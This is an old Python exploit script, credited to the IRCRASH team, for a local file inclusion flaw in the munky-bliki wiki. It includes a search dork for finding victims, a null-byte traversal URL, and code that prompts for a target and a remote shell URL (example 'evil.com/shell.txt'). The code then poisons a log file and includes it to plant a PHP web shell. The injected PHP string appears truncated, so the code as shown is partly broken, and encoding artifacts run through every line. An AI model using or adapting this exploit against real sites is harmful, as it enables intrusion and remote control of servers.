|
|
#!user/bin/python=0D
# -*- coding: cp1256 -*-=0D
#####################################################################################=0D
#### munky-bliki Lfi ####=0D
#####################################################################################=0D
# #=0D
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #=0D
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #=0D
#Our Site : Http://IRCRASH.COM #=0D
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #=0D
#####################################################################################=0D
# #=0D
#Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz=0D
# #=0D
#DORK : "Copyright =A9 2004 Dovid Kopel" #=0D
# #=0D
#####################################################################################=0D
# [Bug] #=0D
# #=0D
#http://Site/?zone=file.type%00 #=0D
# [Note] #=0D
# #=0D
#By this exploit u can create a shell on valun site ;) #=0D
# #=0D
#####################################################################################=0D
# Site : Http://IRCRASH.COM #=0D
###################################### TNX GOD ######################################=0D
import httplib,urllib=0D
site=raw_input('Site [Ex www.r3d.com]: ')=0D
path=raw_input('Path [Ex /munky]: ')=0D
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')=0D
print "[*]Powered by : R3d.W0rm - r3d.w0rm@yahoo.com"=0D
conn=httplib.HTTPConnection(site)=0D
print "[*]Connected to " + site=0D
print "[*]Sending shell code ..."=0D
conn.request('GET',path + "/?zone=');fclose($fp);?>")=0D
print "[*]Running shell code ..."=0D
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')=0D
print "[*]Shell created"=0D
print "[*]" + site + path + '/r3d.w0rm.php'=0D
=0D
=0D
=0D
=0D